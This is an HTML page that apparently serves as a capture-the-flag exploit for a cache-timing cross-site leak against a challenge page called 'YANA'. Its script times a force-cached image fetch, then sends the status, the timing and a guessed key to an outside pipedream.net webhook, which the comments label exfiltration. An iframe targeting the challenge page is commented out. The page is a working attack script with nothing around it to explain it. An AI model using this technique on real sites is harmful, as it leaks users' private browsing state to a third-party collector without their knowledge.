<html>
    <head>
        <script>

            function runTest(param) {
                // Wait for the iframe to load (~500ms)
                setTimeout(() => {

                    // image to load for correct guess
                    img_url = 'https://dotorikko.github.io/static/LoX-Zombie/y.png';

                    // image to report (exfiltration)
                    wh_url = 'https://eov64fuwy36zo3n.m.pipedream.net';

                    var start = window.performance.now();

                    // Load the 'Y' image
                    fetch(img_url, {'mode': 'cors', 'cache': 'force-cache'}).then(response => {
                        var end = window.performance.now();
                        var timing = end - start;

                        // Exfiltrate load time for the image
                        fetch(wh_url + '/yanastats?status=' + response.status + '&time=' + timing + '&key=' + encodeURIComponent(param));
                    });
                    }, 500);
            }
        </script>
    </head>
    <body>
        <!-- Changed hash - non-flag string -->
        <!--//<iframe id="ifr" src="https://dotorikko.github.io/static/LoX-Zombie/YANA.html#flag"></iframe><br/>-->
        <script>
            runTest("flag");
        </script>
    </body>
</html>
